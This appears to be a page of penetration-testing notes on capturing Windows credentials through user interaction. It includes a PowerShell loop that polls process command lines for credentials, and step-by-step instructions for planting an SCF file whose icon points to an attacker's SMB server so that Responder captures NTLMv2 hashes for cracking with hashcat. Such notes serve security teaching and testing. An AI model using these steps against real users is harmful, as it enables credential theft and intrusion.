Interacting with Users
Once we have exhausted all options, we can look at specific techniques to steal credentials from an unsuspecting user by sniffing their network traffic/local commands or attacking a known vulnerable service requiring user interaction.
Traffic Capture
If Wireshark is installed we can use it to capture network traffic.
We can also use a tool like net-creds to sniff passwords and hashes from a live interface or a pcap file.
Process Command Lines
Process command lines are the full commands that are used to execute a process. They include the executable name and any arguments or options passed to it.
They can also contain credentials.
This script below captures process command lines every two seconds and displays the differences:
while($true)
{
$process = Get-WmiObject Win32_Process | Select-Object CommandLine
Start-Sleep 1
$process2 = Get-WmiObject Win32_Process | Select-Object CommandLine
Compare-Object -ReferenceObject $process -DifferenceObject $process2
}We can trigger it remotely:
Vulnerable Service
Some vulnerables service can be used to privesc through user interaction
Example with CVE-2019–15752 which allowed to force the execution of an extra executable after the user logs into Docker Desktop.
We could use this vulnerability to steal credentials via a fake loging popup.
SCF on File Share
SCF
An SCF (Shell Command File) is a text file that contains instructions for Windows Explorer. It can be used to perform actions like opening a folder, move up and down directories, show the Desktop, etc.. SCF files are similar to shortcuts but can execute commands. They are simple text files with a
.scfextension and contain settings in INI file format.
This SCF file opens C:\Windows:
[Shell]and[Taskbar]are section headers.Command=2under[Shell]: Specifies the type of shell operation.2usually means "open folder or file."IconFile=explorer.exe,3: Sets the icon for the SCF file, using the fourth icon fromexplorer.exe.Command=OpenFolderunder[Taskbar]: Directs the SCF file to open a folder.Folder=C:\Windows: Specifies which folder to open, in this caseC:\Windows.
Malicious Exploitation
An SCF file can be manipulated to have the icon file location point to a specific UNC path and have Windows Explorer start an SMB session when the folder where the .scf file resides is accessed.
If we change the IconFile to an SMB server that we control and run a tool such as Responder, Inveigh, or InveighZero, we can often capture NTLMv2 password hashes for any users who browse the share.
Attack
First we create the malicious SCF:
In IconFile we put our attacker IP and a fake share name and icon.
Then we transfer it to the share. We put an @ at the start of the file name to appear at the top of the directory to ensure it is seen and executed by Windows Explorer as soon as the user accesses the share.
On our attacking machine we start Responder on the interface we want to listen to:
(Make sure to open port 445 on the attacker).
When the user visits the share, responder will capture the NTLM hash and we can crack it with hashcat:
LNK files
This SCF attack doesn't work on Server 2019 hosts but the same can be achieved with LNK files, either using a tool such as Lnkbomb or using a few lines of Powershell:
Last updated